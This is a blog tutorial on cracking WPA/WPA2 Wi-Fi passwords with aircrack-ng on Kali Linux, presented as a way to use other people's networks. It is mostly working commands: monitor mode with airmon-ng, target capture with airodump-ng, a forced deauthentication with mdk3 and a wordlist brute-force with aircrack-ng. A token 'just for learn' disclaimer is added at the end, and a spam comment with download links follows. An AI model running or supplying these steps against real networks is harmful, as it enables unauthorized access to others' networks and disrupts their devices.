-->

How to Hack WIFI Password WPA/WPA2 with Aircrack-ng on Kali Linux

If you don't have internet access you can search internet access form wifi around you, wifi always have password for security, so not everyone can use it. For get the wifi password can be done in various ways, one of the with bruteforce, it can try various key to login in to access point. Aircrack-ng is the powerfull tools in kali linux for bruteforce the wpa/wpa2 key, so in this article i will show how to hack wifi password so easy with aircrack-ng, and lets get started.


Hack WIFI Password WPA/WPA2 with Aircrack-ng

1. Download Wordlist
2. Open the Terminal
3. Change the Wlan to monitoring mode, with type this to terminal
sudo airmon-ng start wlan0

After make the wireless to monitoring mode, you can't use internet access while.

4. The, type this command to terminal
sudo airodump-ng wlan0mon

This fuction for search wifi available around you. and you can look the SSID and user conected to the access point, and set the target.

5. Run the airodump-ng with SSID target, like this
sudo airodump-ng numberofchannel --bssid -w namecapture wlan0mon
Example
sudo airodump-ng -c 9 --bssid 68:FF:7B:22:35:38 -w wificrackradar wlan0mon

6. Now, wifi focus to one access point, and you can see device conected.


 And if you see the dirctory downloads, file of capture saved to this directory


Before you can bruteforce the wifi, you must get handshake device are conected from access point.

7. For get hand shake, open the Terminal and type this command.
sudo mdk3 wlan0mon d

If you get handshake you will see this at your terminal.


8. Next, open new Terminal and type this command
sudo aircrack-ng -w lokasiwordlis/name'swordlist -b BSSID nameofcapturesavedcap
Example
 sudo aircrack-ng -w /root/Downloads/wl.txt -b 68:FF:7B:22:35:38 wificrackradar-02.cap

9. Now, bruteforce wifi password proccess is running. You can wait, maybe this process spend long time.


10.  Password obtained successfully


Okay, this way to hack password wifi wpa/wpa using aircrack-ng in kali linux, so this just for learn and don't be misused.so many times from me, hopefully it's useful. Thank you!

Berlangganan update artikel terbaru via email:

2 Responses to "How to Hack WIFI Password WPA/WPA2 with Aircrack-ng on Kali Linux"

  1. Muy buen material en tu blog, todo explicado a la perfección, muchas gracias por la información para descifrar claves wifi

    ReplyDelete
  2. How To Hack Wifi Password Wpa/Wpa2 With Aircrack-Ng On Kali Linux - Andronlinux >>>>> Download Now

    >>>>> Download Full

    How To Hack Wifi Password Wpa/Wpa2 With Aircrack-Ng On Kali Linux - Andronlinux >>>>> Download LINK

    >>>>> Download Now

    How To Hack Wifi Password Wpa/Wpa2 With Aircrack-Ng On Kali Linux - Andronlinux >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel